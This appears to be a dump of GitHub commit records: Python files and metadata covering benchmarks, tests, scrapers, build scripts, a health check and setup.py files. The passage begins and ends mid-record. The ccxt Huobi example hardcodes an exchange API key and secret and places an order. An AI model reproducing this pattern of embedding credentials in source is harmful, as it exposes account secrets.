descargues = int(linia.split(";")[4])
resultat = linia1[0]+";"+linia1[1]+";"+linia1[2]+";"+linia1[3]+";"+str(descargues+1)+";"+linia1[5]+";"+linia1[6]+";"+linia1[7]
file.write(resultat)
trobat = True
else:
print("Error! No se ha podido encontrar el fichero de aplicaciones!")
return trobat
| mit | Python | |
71d8ef8a872656df8a2319032855cb2b5ea5ed4b | Add a new benchmark - readline server | MagicStack/uvloop,1st1/uvloop,MagicStack/uvloop | examples/bench/rlserver.py | examples/bench/rlserver.py | import argparse
import asyncio
import gc
import uvloop
import os.path
import socket as socket_module
from socket import *
PRINT = 0
async def echo_client_streams(reader, writer):
sock = writer.get_extra_info('socket')
try:
sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
except (OSError, NameError):
pass
if PRINT:
print('Connection from', sock.getpeername())
while True:
data = await reader.readline()
if not data:
break
writer.write(data)
if PRINT:
print('Connection closed')
writer.close()
async def print_debug(loop):
while True:
print(chr(27) + "[2J") # clear screen
loop.print_debug_info()
await asyncio.sleep(0.5, loop=loop)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--uvloop', default=False, action='store_true')
parser.add_argument('--addr', default='127.0.0.1:25000', type=str)
parser.add_argument('--print', default=False, action='store_true')
args = parser.parse_args()
if args.uvloop:
loop = uvloop.new_event_loop()
print('using UVLoop')
else:
loop = asyncio.new_event_loop()
print('using asyncio loop')
asyncio.set_event_loop(loop)
loop.set_debug(False)
if args.print:
PRINT = 1
if hasattr(loop, 'print_debug_info'):
loop.create_task(print_debug(loop))
PRINT = 0
unix = False
if args.addr.startswith('file:'):
unix = True
addr = args.addr[5:]
if os.path.exists(addr):
os.remove(addr)
else:
addr = args.addr.split(':')
addr[1] = int(addr[1])
addr = tuple(addr)
print('readline performance test')
print('serving on: {}'.format(addr))
print('using asyncio/streams')
if unix:
coro = asyncio.start_unix_server(echo_client_streams,
addr, loop=loop, limit=256000)
else:
coro = asyncio.start_server(echo_client_streams,
*addr, loop=loop, limit=256000)
srv = loop.run_until_complete(coro)
try:
loop.run_forever()
finally:
if hasattr(loop, 'print_debug_info'):
gc.collect()
print(chr(27) + "[2J")
loop.print_debug_info()
loop.close()
| apache-2.0 | Python | |
af2303062c7d4bbbcbe92df3d0c01d7729b910f2 | add swap example | ccxt/ccxt,ccxt/ccxt,ccxt/ccxt,ccxt/ccxt,ccxt/ccxt | examples/py/huobi-swaps.py | examples/py/huobi-swaps.py | # -*- coding: utf-8 -*-
import os
from random import randint
import sys
from pprint import pprint
root = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(root + '/python')
import ccxt # noqa: E402
print('CCXT Version:', ccxt.__version__)
exchange = ccxt.huobi({
'apiKey': 'ez2xc4vb6n-da8c4c7d-76cbde5b-7cc77',
'secret': '03454cfd-cf15e71b-fe87eadf-16a79',
'options': {
'defaultType': 'future',
},
})
markets = exchange.load_markets()
# exchange.verbose = True # uncomment for debugging purposes if necessary
# # ## Create a linear future (limit) order
# symbol = 'ADA/USDT:USDT'
# order_type = 'limit'
# side = 'buy'
# offset = 'open'
# # contract_type = 'this_week'
# cli_order_id = randint(0,1000)
# leverage = 1
# amount = 1 # 1 contract = 10 ADA
# price = 1
# params = {'offset': offset, 'lever_rate': leverage, 'client_order_id': cli_order_id}
# try:
# order = exchange.create_order(symbol, order_type, side, amount, price, params)
# print(order)
# except Exception as e:
# print(type(e).__name__, str(e))
## Create a inverse swap (limit) order that will
symbol = 'ADA/USD:ADA'
order_type = 'limit'
side = 'buy'
offset = 'open'
cli_order_id = randint(0,1000)
leverage = 1
amount = 1
price = 1
params = {'offset': offset, 'lever_rate': leverage, 'client_order_id': cli_order_id}
try:
order = exchange.create_order(symbol, order_type, side, amount, price, params)
print(order)
cancelOrder = exchange.cancel_order(order['id'], symbol)
except Exception as e:
print(type(e).__name__, str(e))
| mit | Python | |
1ac4dd4438dd054f32e23c6db01d2382507ed4c7 | break out shapefile tests | lightmare/mapnik,Airphrame/mapnik,whuaegeanse/mapnik,CartoDB/mapnik,CartoDB/mapnik,Airphrame/mapnik,cjmayo/mapnik,tomhughes/mapnik,rouault/mapnik,Mappy/mapnik,Mappy/mapnik,Mappy/mapnik,mbrukman/mapnik,yiqingj/work,mapycz/mapnik,pnorman/mapnik,lightmare/mapnik,kapouer/mapnik,pnorman/mapnik,rouault/mapnik,tomhughes/python-mapnik,kapouer/mapnik,mapycz/python-mapnik,zerebubuth/mapnik,Uli1/mapnik,mapnik/mapnik,pramsey/mapnik,naturalatlas/mapnik,pramsey/mapnik,jwomeara/mapnik,tomhughes/python-mapnik,manz/python-mapnik,davenquinn/python-mapnik,qianwenming/mapnik,mapnik/mapnik,strk/mapnik,Uli1/mapnik,strk/mapnik,Airphrame/mapnik,garnertb/python-mapnik,strk/mapnik,qianwenming/mapnik,yohanboniface/python-mapnik,whuaegeanse/mapnik,rouault/mapnik,whuaegeanse/mapnik,mapycz/mapnik,lightmare/mapnik,Uli1/mapnik,cjmayo/mapnik,strk/mapnik,CartoDB/mapnik,yohanboniface/python-mapnik,naturalatlas/mapnik,manz/python-mapnik,naturalatlas/mapnik,Mappy/mapnik,sebastic/python-mapnik,tomhughes/python-mapnik,garnertb/python-mapnik,davenquinn/python-mapnik,mapnik/python-mapnik,kapouer/mapnik,zerebubuth/mapnik,yiqingj/work,qianwenming/mapnik,yiqingj/work,lightmare/mapnik,mbrukman/mapnik,cjmayo/mapnik,Uli1/mapnik,pramsey/mapnik,qianwenming/mapnik,mapnik/python-mapnik,jwomeara/mapnik,jwomeara/mapnik,mapnik/mapnik,stefanklug/mapnik,pnorman/mapnik,davenquinn/python-mapnik,mapycz/python-mapnik,sebastic/python-mapnik,qianwenming/mapnik,rouault/mapnik,zerebubuth/mapnik,kapouer/mapnik,sebastic/python-mapnik,mapnik/python-mapnik,pramsey/mapnik,Airphrame/mapnik,yohanboniface/python-mapnik,jwomeara/mapnik,mapnik/mapnik,mbrukman/mapnik,stefanklug/mapnik,stefanklug/mapnik,tomhughes/mapnik,whuaegeanse/mapnik,garnertb/python-mapnik,tomhughes/mapnik,tomhughes/mapnik,stefanklug/mapnik,manz/python-mapnik,mbrukman/mapnik,naturalatlas/mapnik,yiqingj/work,cjmayo/mapnik,pnorman/mapnik,mapycz/mapnik | tests/python_tests/shapefile_test.py | tests/python_tests/shapefile_test.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from nose.tools import *
from utilities import execution_path
import os, mapnik2
def setup():
# All of the paths used are relative, if we run the tests
# from another directory we need to chdir()
os.chdir(execution_path('.'))
if 'shape' in mapnik2.DatasourceCache.instance().plugin_names():
# Shapefile initialization
def test_shapefile_init():
s = mapnik2.Shapefile(file='../../demo/data/boundaries')
e = s.envelope()
assert_almost_equal(e.minx, -11121.6896651, places=7)
assert_almost_equal(e.miny, -724724.216526, places=6)
assert_almost_equal(e.maxx, 2463000.67866, places=5)
assert_almost_equal(e.maxy, 1649661.267, places=3)
# Shapefile properties
def test_shapefile_properties():
s = mapnik2.Shapefile(file='../../demo/data/boundaries', encoding='latin1')
f = s.features_at_point(s.envelope().center()).features[0]
eq_(f['CGNS_FID'], u'6f733341ba2011d892e2080020a0f4c9')
eq_(f['COUNTRY'], u'CAN')
eq_(f['F_CODE'], u'FA001')
eq_(f['NAME_EN'], u'Quebec')
# this seems to break if icu data linking is not working
eq_(f['NOM_FR'], u'Qu\xe9bec')
eq_(f['NOM_FR'], u'Québec')
eq_(f['Shape_Area'], 1512185733150.0)
eq_(f['Shape_Leng'], 19218883.724300001)
# Check that the deprecated interface still works,
# remove me once the deprecated code is cleaned up
eq_(f.properties['Shape_Leng'], 19218883.724300001)
if __name__ == "__main__":
setup()
[eval(run)() for run in dir() if 'test_' in run]
| lgpl-2.1 | Python | |
64dac000cd4edb3a461918f8253e43bc47d6b594 | Create editUtils.py | ssarkar2/caffeSEA,ssarkar2/caffeSEA | utils/editUtils.py | utils/editUtils.py | # new_data = {'max_iter': 5000, 'snapshot': 500}
def createSolverPrototxt(new_data, save_loc):
f = open('solverToy.prototxt')
def_text = f.read().split('\n')
def_text.remove('')
solver_default_dict = {module.split(': ')[0]: module.split(': ')[1] for module in def_text}
new_dictionary = solver_default_dict
for key, value in new_data.iteritems():
new_dictionary[key] = str(value)
f.close()
new_solver_text = ['{}: {}'.format(key, value) for key, value in new_dictionary.iteritems()]
new_proto = '\n'.join(new_solver_text)
new_file_name = save_loc + 'solverToy_new.prototxt'
f_new = open(new_file_name, 'w')
f_new.write(new_proto)
f_new.close()
| mit | Python | |
b41776096e6982e6ef0faef1fc95b550bebed9e8 | add script to calculate average oil price | thiagodasilva/home_automation,thiagodasilva/home_automation | oil_price/average_oil_price.py | oil_price/average_oil_price.py | #!/usr/bin/env python
import urllib
import paho.mqtt.publish as publish
from bs4 import BeautifulSoup as bs
newenglandoil = urllib.urlopen("http://www.newenglandoil.com/massachusetts/zone10.asp?x=0").read()
soup = bs(newenglandoil, 'lxml')
oil_table = soup.find('table')
tbody = oil_table.find('tbody')
rows = tbody.find_all('tr')
sum = 0
for row in rows:
td = row.find_all('td')
sum += float(td[2].get_text()[1:])
average = sum/len(rows)
publish.single('average_oil_price', average)
| mit | Python | |
a7a8cee70ffee9446aad19c9775d13c2b608c397 | Add RungeKuttaEvolver class. | fangohr/oommf-python,fangohr/oommf-python,fangohr/oommf-python | new/evolvers.py | new/evolvers.py | class RungeKuttaEvolve(object):
def __init__(self, alpha, gamma_G=2.210173e5, start_dm=0.01):
if not isinstance(alpha, (int, float)) or alpha < 0:
raise ValueError('alpha must be a positive float or int.')
else:
self.alpha = alpha
if not isinstance(gamma_G, (float, int)) or gamma_G <= 0:
raise ValueError('gamma_G must be a positive float or int.')
else:
self.gamma_G = gamma_G
if not isinstance(start_dm, (float, int)) or start_dm <= 0:
raise ValueError('start_dm must be a positive float or int.')
else:
self.start_dm = start_dm
def get_mif(self):
data = [('alpha', self.alpha),
('gamma_G', self.gamma_G),
('start_dm', self.start_dm)]
# Create mif string.
mif = '# RungeKutta evolver\n'
for datum in data:
mif += 'set {} {}\n'.format(datum[0], datum[1])
mif += 'Specify Oxs_RungeKuttaEvolve {\n'
mif += '\talpha $alpha\n'
mif += '\tgamma_G $gamma_G\n'
mif += '\tstart_dm $start_dm\n'
mif += '}\n\n'
return mif
| bsd-2-clause | Python | |
39c853f64b837d257333c5731067c811344f9dfd | Add highlight.py (Python syntax highlighting) | kikocorreoso/brython,Isendir/brython,Hasimir/brython,amrdraz/brython,amrdraz/brython,kevinmel2000/brython,JohnDenker/brython,firmlyjin/brython,Mozhuowen/brython,Mozhuowen/brython,molebot/brython,amrdraz/brython,olemis/brython,olemis/brython,rubyinhell/brython,Lh4cKg/brython,molebot/brython,Mozhuowen/brython,brython-dev/brython,Lh4cKg/brython,brython-dev/brython,brython-dev/brython,olemis/brython,rubyinhell/brython,Isendir/brython,kevinmel2000/brython,firmlyjin/brython,rubyinhell/brython,Hasimir/brython,Mozhuowen/brython,molebot/brython,Lh4cKg/brython,kikocorreoso/brython,JohnDenker/brython,rubyinhell/brython,olemis/brython,jonathanverner/brython,jonathanverner/brython,Isendir/brython,Lh4cKg/brython,Hasimir/brython,Hasimir/brython,firmlyjin/brython,jonathanverner/brython,JohnDenker/brython,Isendir/brython,firmlyjin/brython,molebot/brython,kikocorreoso/brython,firmlyjin/brython,amrdraz/brython,jonathanverner/brython,kevinmel2000/brython,JohnDenker/brython,kevinmel2000/brython | src/Lib/site-packages/highlight.py | src/Lib/site-packages/highlight.py | import keyword
import _jsre as re
from browser import html
letters = 'abcdefghijklmnopqrstuvwxyz'
letters += letters.upper()+'_'
digits = '0123456789'
builtin_funcs = ("abs|divmod|input|open|staticmethod|all|enumerate|int|ord|str|any|" +
"eval|isinstance|pow|sum|basestring|execfile|issubclass|print|super|" +
"binfile|iter|property|tuple|bool|filter|len|range|type|bytearray|" +
"float|list|raw_input|unichr|callable|format|locals|reduce|unicode|" +
"chr|frozenset|long|reload|vars|classmethod|getattr|map|repr|xrange|" +
"cmp|globals|max|reversed|zip|compile|hasattr|memoryview|round|" +
"__import__|complex|hash|min|set|apply|delattr|help|next|setattr|" +
"buffer|dict|hex|object|slice|coerce|dir|id|oct|sorted|intern")
kw_pattern = '^('+'|'.join(keyword.kwlist)+')$'
bf_pattern = '^('+builtin_funcs+')$'
def highlight(txt, string_color="blue", comment_color="green",
keyword_color="purple"):
res = html.PRE()
i = 0
name = ''
while i<len(txt):
car = txt[i]
if car in ["'",'"']:
k = i+1
while k<len(txt):
if txt[k]==car:
nb_as = 0
j = k-1
while True:
if txt[j]=='\\':
nb_as+=1
j -= 1
else:
break
if nb_as % 2 == 0:
res <= html.SPAN(txt[i:k+1],
style=dict(color=string_color))
i = k
break
k += 1
elif car == '#': # comment
end = txt.find('\n', i)
if end== -1:
res <= html.SPAN(txt[i:],style=dict(color=comment_color))
break
else:
res <= html.SPAN(txt[i:end],style=dict(color=comment_color))
i = end-1
elif car in letters:
name += car
elif car in digits and name:
name += car
else:
if name:
if re.search(kw_pattern,name):
res <= html.SPAN(name,style=dict(color=keyword_color))
elif re.search(bf_pattern,name):
res <= html.SPAN(name,style=dict(color=keyword_color))
else:
res <= name
name = ''
res <= car
i += 1
res <= name
print(res)
return res | bsd-3-clause | Python | |
d5bf180394233a165f4b5ad8c6561509a4e465ca | add goliad health check | yieldbot/sensu-yieldbot-plugins,yieldbot/sensu-yieldbot-plugins,yieldbot/sensu-yieldbot-plugins | plugins/bongo/check-goliad-health.py | plugins/bongo/check-goliad-health.py | #!/usr/bin/env python
from optparse import OptionParser
import socket
import sys
import httplib
import json
PASS = 0
WARNING = 1
FAIL = 2
def get_bongo_host(server, app):
try:
con = httplib.HTTPConnection(server, timeout=45)
con.request("GET","/v2/apps/" + app)
data = con.getresponse()
if data.status >= 300:
print "get_bongo_host: Recieved non-2xx response= %s" % (data.status)
sys.exit(FAIL)
json_data = json.loads(data.read())
host = json_data['app']['tasks'][0]['host']
port = json_data['app']['tasks'][0]['ports'][0]
con.close()
return host, port
except Exception, e:
print "%s Exception caught in get_bongo_host" % (e)
sys.exit(FAIL)
def get_status(host, group):
try:
con = httplib.HTTPConnection(host,timeout=45)
con.request("GET","/v1/health/betty/" + group)
data = con.getresponse()
if data.status >= 300:
print "Recieved non-2xx response= %s in get_status" % (data.status)
sys.exit(FAIL)
json_data = json.loads(data.read())
con.close()
if json_data['status'] == 2:
print "%s" % (json_data['msg'])
sys.exit(FAIL)
elif json_data['status'] == 1:
print "%s" % (json_data['msg'])
sys.exit(WARNING)
else:
print " `%s` is fine" %group
sys.exit(PASS)
except Exception, e:
print "%s Exception caught in get_status" % (e)
sys.exit(FAIL)
if __name__=="__main__":
parser = OptionParser()
parser.add_option("-s", dest="server", action="store", default="localhost:8080", help="Marathon Cluster address with port no")
parser.add_option("-a", dest="app", action="store", default="bongo.useast.prod", help="App Id to retrieve the slave address")
parser.add_option("-c", dest="group", action="store", default="betty.useast.prod", help="Name of betty Consumer Group")
(options, args) = parser.parse_args()
host, port = get_bongo_host(options.server, options.app)
if "useast" in host:
host = host.rsplit("prd",1)
consul_host = "%snode.us-east-1.consul:%s" % (host[0], port)
else:
consul_host = "%s:%s" % (host, port)
get_status(consul_host, options.group)
| mit | Python | |
ce68b7f025d1ee25a58a093adf462b4b77fb0ad4 | remove duplicate calls to cfg.get() | bgxavier/nova,klmitch/nova,whitepages/nova,joker946/nova,whitepages/nova,rajalokan/nova,zaina/nova,eonpatapon/nova,scripnichenko/nova,vmturbo/nova,double12gzh/nova,raildo/nova,edulramirez/nova,klmitch/nova,rahulunair/nova,adelina-t/nova,NeCTAR-RC/nova,Juniper/nova,MountainWei/nova,hanlind/nova,mikalstill/nova,iuliat/nova,vmturbo/nova,cloudbase/nova,jeffrey4l/nova,dawnpower/nova,rajalokan/nova,alexandrucoman/vbox-nova-driver,devendermishrajio/nova,hanlind/nova,JioCloud/nova,akash1808/nova,Juniper/nova,Stavitsky/nova,j-carpentier/nova,Francis-Liu/animated-broccoli,edulramirez/nova,mmnelemane/nova,mandeepdhami/nova,CloudServer/nova,cloudbase/nova,cernops/nova,rajalokan/nova,ruslanloman/nova,CCI-MOC/nova,petrutlucian94/nova,iuliat/nova,watonyweng/nova,akash1808/nova_test_latest,CloudServer/nova,Tehsmash/nova,cloudbase/nova,BeyondTheClouds/nova,akash1808/nova,rahulunair/nova,tangfeixiong/nova,takeshineshiro/nova,apporc/nova,sebrandon1/nova,isyippee/nova,phenoxim/nova,JioCloud/nova_test_latest,jianghuaw/nova,gooddata/openstack-nova,thomasem/nova,CCI-MOC/nova,fnordahl/nova,fnordahl/nova,vmturbo/nova,barnsnake351/nova,dims/nova,cyx1231st/nova,Francis-Liu/animated-broccoli,rahulunair/nova,NeCTAR-RC/nova,JioCloud/nova,varunarya10/nova_test_latest,mahak/nova,gooddata/openstack-nova,kimjaejoong/nova,sebrandon1/nova,jianghuaw/nova,mandeepdhami/nova,bigswitch/nova,tealover/nova,eonpatapon/nova,Tehsmash/nova,tealover/nova,varunarya10/nova_test_latest,alaski/nova,openstack/nova,nikesh-mahalka/nova,vmturbo/nova,yatinkumbhare/openstack-nova,zhimin711/nova,jianghuaw/nova,rajalokan/nova,joker946/nova,raildo/nova,double12gzh/nova,dawnpower/nova,Stavitsky/nova,adelina-t/nova,mahak/nova,Juniper/nova,blueboxgroup/nova,gooddata/openstack-nova,jianghuaw/nova,openstack/nova,phenoxim/nova,kimjaejoong/nova,tudorvio/nova,alvarolopez/nova,petrutlucian94/nova,isyippee/nova,ted-gould/nova,thomasem/nova,watonyweng/nova,mikalstill/nova,CEG-FYP-OpenStack/scheduler,cyx1231st/nova,sebrandon1/nova,hanlind/nova,devendermishrajio/nova_test_latest,JioCloud/nova_test_latest,alvarolopez/nova,TwinkleChawla/nova,barnsnake351/nova,JianyuWang/nova,j-carpentier/nova,jeffrey4l/nova,JianyuWang/nova,zzicewind/nova,alaski/nova,devendermishrajio/nova_test_latest,tudorvio/nova,noironetworks/nova,mmnelemane/nova,BeyondTheClouds/nova,klmitch/nova,bigswitch/nova,yosshy/nova,shail2810/nova,dims/nova,klmitch/nova,ruslanloman/nova,scripnichenko/nova,gooddata/openstack-nova,bgxavier/nova,zaina/nova,blueboxgroup/nova,felixma/nova,CEG-FYP-OpenStack/scheduler,zhimin711/nova,shail2810/nova,alexandrucoman/vbox-nova-driver,yosshy/nova,zzicewind/nova,noironetworks/nova,BeyondTheClouds/nova,LoHChina/nova,cernops/nova,tangfeixiong/nova,takeshineshiro/nova,LoHChina/nova,MountainWei/nova,belmiromoreira/nova,belmiromoreira/nova,ted-gould/nova,mikalstill/nova,cernops/nova,mahak/nova,apporc/nova,TwinkleChawla/nova,felixma/nova,devendermishrajio/nova,openstack/nova,yatinkumbhare/openstack-nova,nikesh-mahalka/nova,akash1808/nova_test_latest,Juniper/nova | nova/version.py | nova/version.py | # Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import pbr.version
from nova.i18n import _LE
NOVA_VENDOR = "OpenStack Foundation"
NOVA_PRODUCT = "OpenStack Nova"
NOVA_PACKAGE = None # OS distro package version suffix
loaded = False
version_info = pbr.version.VersionInfo('nova')
version_string = version_info.version_string
def _load_config():
# Don't load in global context, since we can't assume
# these modules are accessible when distutils uses
# this module
import ConfigParser
from oslo.config import cfg
from nova.openstack.common import log as logging
global loaded, NOVA_VENDOR, NOVA_PRODUCT, NOVA_PACKAGE
if loaded:
return
loaded = True
cfgfile = cfg.CONF.find_file("release")
if cfgfile is None:
return
try:
cfg = ConfigParser.RawConfigParser()
cfg.read(cfgfile)
if cfg.has_option("Nova", "vendor"):
NOVA_VENDOR = cfg.get("Nova", "vendor")
if cfg.has_option("Nova", "product"):
NOVA_PRODUCT = cfg.get("Nova", "product")
if cfg.has_option("Nova", "package"):
NOVA_PACKAGE = cfg.get("Nova", "package")
except Exception as ex:
LOG = logging.getLogger(__name__)
LOG.error(_LE("Failed to load %(cfgfile)s: %(ex)s"),
{'cfgfile': cfgfile, 'ex': ex})
def vendor_string():
_load_config()
return NOVA_VENDOR
def product_string():
_load_config()
return NOVA_PRODUCT
def package_string():
_load_config()
return NOVA_PACKAGE
def version_string_with_package():
if package_string() is None:
return version_info.version_string()
else:
return "%s-%s" % (version_info.version_string(), package_string())
| # Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import pbr.version
from nova.i18n import _LE
NOVA_VENDOR = "OpenStack Foundation"
NOVA_PRODUCT = "OpenStack Nova"
NOVA_PACKAGE = None # OS distro package version suffix
loaded = False
version_info = pbr.version.VersionInfo('nova')
version_string = version_info.version_string
def _load_config():
# Don't load in global context, since we can't assume
# these modules are accessible when distutils uses
# this module
import ConfigParser
from oslo.config import cfg
from nova.openstack.common import log as logging
global loaded, NOVA_VENDOR, NOVA_PRODUCT, NOVA_PACKAGE
if loaded:
return
loaded = True
cfgfile = cfg.CONF.find_file("release")
if cfgfile is None:
return
try:
cfg = ConfigParser.RawConfigParser()
cfg.read(cfgfile)
NOVA_VENDOR = cfg.get("Nova", "vendor")
if cfg.has_option("Nova", "vendor"):
NOVA_VENDOR = cfg.get("Nova", "vendor")
NOVA_PRODUCT = cfg.get("Nova", "product")
if cfg.has_option("Nova", "product"):
NOVA_PRODUCT = cfg.get("Nova", "product")
NOVA_PACKAGE = cfg.get("Nova", "package")
if cfg.has_option("Nova", "package"):
NOVA_PACKAGE = cfg.get("Nova", "package")
except Exception as ex:
LOG = logging.getLogger(__name__)
LOG.error(_LE("Failed to load %(cfgfile)s: %(ex)s"),
{'cfgfile': cfgfile, 'ex': ex})
def vendor_string():
_load_config()
return NOVA_VENDOR
def product_string():
_load_config()
return NOVA_PRODUCT
def package_string():
_load_config()
return NOVA_PACKAGE
def version_string_with_package():
if package_string() is None:
return version_info.version_string()
else:
return "%s-%s" % (version_info.version_string(), package_string())
| apache-2.0 | Python |
02de60c0157aaa52d8f31fe623902a32c734d248 | add generic A&A make script | adamginsburg/APEX_CMZ_H2CO,keflavich/APEX_CMZ_H2CO,adamginsburg/APEX_CMZ_H2CO,keflavich/APEX_CMZ_H2CO | tex/make.py | tex/make.py | #!/bin/env python
import subprocess
import shutil
import glob
import argparse
import os
name = 'apex_cmz_h2co'
parser = argparse.ArgumentParser(description='Make latex files.')
parser.add_argument('--referee', default=False,
action='store_true', help='referee style?')
parser.add_argument('--texpath', default='/usr/texbin/',
help='path to pdflatex')
parser.add_argument('--infile', default=name+'.tex')
parser.add_argument('--outfile', default='auto')
parser.add_argument('--noclean', default=True, action='store_false')
parser.add_argument('--both', default=False, action='store_true')
args = parser.parse_args()
def do_everything():
if not args.noclean:
for globstr in (name+"*.aux", name+"*.bbl", name+"*.blg",
name+"*.dvi", name+"*.log", name+"*.lot",
name+"*.lof"):
for fn in glob.glob(globstr):
os.remove(fn)
PDFLATEX=os.path.join(args.texpath,'pdflatex')
pdflatex_args = "-halt-on-error -synctex=1 --interaction=nonstopmode".split()
BIBTEX = os.path.join(args.texpath, 'bibtex')
with open('preface.tex','r') as f:
preface = f.read()
with open('preface_aa.tex','w') as aa:
if args.referee:
aa.write('\documentclass[referee]{aa}\n')
aa.write(preface)
else:
aa.write('\documentclass{aa}\n')
aa.write(preface)
pdfcmd = [PDFLATEX] + pdflatex_args + [args.infile]
bibcmd = [BIBTEX, args.infile.replace(".tex","")]
subprocess.call(pdfcmd)
subprocess.call(bibcmd)
subprocess.call(pdfcmd)
subprocess.call(bibcmd)
subprocess.call(pdfcmd)
if args.outfile == 'auto':
outprefix = name+'_referee' if args.referee else name
else:
outprefix = os.path.splitext(args.outfile)[0]
# Don't move unnecessarily; messes with Skim.app (maybe?)
if os.path.split(os.path.basename(outprefix))[0] != name:
shutil.move(name+".pdf",outprefix+".pdf")
gscmd = ["gs",
"-dSAFER",
"-dBATCH",
"-dNOPAUSE",
"-sDEVICE=pdfwrite",
"-sOutputFile={0}_compressed.pdf".format(outprefix),
"{0}.pdf".format(outprefix)]
subprocess.call(gscmd)
if args.both:
args.referee = True
do_everything()
args.referee = False
do_everything()
else:
do_everything()
| bsd-3-clause | Python | |
c1fb3eb548b15ab8049841696b7ae74604c8ed89 | Test for pytest.ini as session-scoped fixture | opentechinstitute/commotion-router-test-suite | tests/conftest.py | tests/conftest.py | """
Config instructions and test fixtures
"""
import pytest
import os
import sys
# # these are just some fun dividiers to make the output pretty
# # completely unnecessary, I was just playing with autouse fixtures
# @pytest.fixture(scope="function", autouse=True)
# def divider_function(request):
# print('\n --- function %s() start ---' % request.function.__name__)
# def fin():
# print(' --- function %s() done ---' % request.function.__name__)
# request.addfinalizer(fin)
@pytest.fixture(scope="session", autouse=True)
def set_up_ini(request):
print("in set_up_ini")
try:
# need to back up a directory
path = os.path.dirname(os.path.abspath("conftest.py"))
print(path)
if not os.path.isfile(path + "/pytest.ini"):
raise FileNotFoundError("Pytest.ini not found.")
except FileNotFoundError as args:
print(args)
try:
import shutil
print("Creating pytest.ini")
shutil.copyfile(path + "/example-pytest.ini", path + "/pytest.ini")
except OSError as args:
print("Error creating pytest.ini. ", args)
else:
print("Don't forget to add node admin credentials to pytest.ini!")
| agpl-3.0 | Python | |
5da51f9ac93487d144f53de30fed69484b9b64dd | add setup script | janbrohl/XMLCompare | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
import xmlcompare
setup(name="XMLCompare",
version=xmlcompare.__version__,
description="XMLCompare checks XML documents/elements for semantic equality",
author="Jan Brohl",
author_email="janbrohl@t-online.de",
url="https://github.com/janbrohl/xmlcompare",
py_modules=[
'xmlcompare'
],
classifiers=[
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
]
)
| bsd-3-clause | Python | |
ab22712aa4dc628e257b592c56319871b6ed8f18 | Add setup.py file. | danriti/python-traceview | setup.py | setup.py | #!/usr/bin/env python
from setuptools import setup
import traceview
packages = []
requires = []
setup(
name="python-traceview",
version=traceview.__version__,
description="TraceView API Client",
#long_description=long_description,
# The project URL.
url='https://github.com/danriti/python-traceview',
# Author details
author='Daniel Riti',
author_email='dmriti@gmail.com',
# Choose your license
license='MIT',
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
],
# What does your project relate to?
keywords='traceview api client development performance',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages.
packages=packages,
# List run-time dependencies here. These will be installed by pip when your
# project is installed.
install_requires=requires,
)
| mit | Python | |
43bdadcad33751b2ddbdac332106127a938f3492 | Add setuptools-based setup.py file | lvh/txampext | setup.py | setup.py | #!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='txampext',
version='20121226',
description="Extensions to Twisted's AMP implementation",
url='https://github.com/lvh/txampext',
author='Laurens Van Houtven',
author_email='_@lvh.cc',
packages=find_packages(),
install_requires=['twisted'],
license='ISC',
classifiers=[
"Development Status :: 3 - Alpha",
"Framework :: Twisted",
"License :: OSI Approved :: ISC License (ISCL)",
])
| isc | Python | |
4a42116d0858089dbf2ac2fd8efdcb5ef9226b90 | bump version to 1.0.2 | Filechaser/sickbeard_mp4_automator,phtagn/sickbeard_mp4_automator,Collisionc/sickbeard_mp4_automator,Collisionc/sickbeard_mp4_automator,Filechaser/sickbeard_mp4_automator,phtagn/sickbeard_mp4_automator | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup, Command
from unittest import TextTestRunner, TestLoader
import os
import os.path
class TestCommand(Command):
user_options = []
def initialize_options(self):
self._testdir = os.path.join(os.getcwd(), 'test')
def finalize_options(self):
pass
def run(self):
os.chdir(self._testdir)
retval = os.system('python -m test')
if retval != 0:
raise Exception('tests failed')
class DocCommand(Command):
user_options = []
def initialize_options(self):
self._docdir = os.path.join(os.getcwd(), 'doc')
def finalize_options(self):
pass
def run(self):
os.chdir(self._docdir)
os.system('make html')
setup(
name = 'VideoConverter',
version = '1.0.2',
description = 'Video Converter library',
url = 'http://senko.net/en/',
author = 'Senko Rasic',
author_email = 'senko.rasic@dobarkod.hr',
cmdclass = {
'test': TestCommand,
'doc': DocCommand
},
packages = [ 'converter' ],
)
| #!/usr/bin/env python
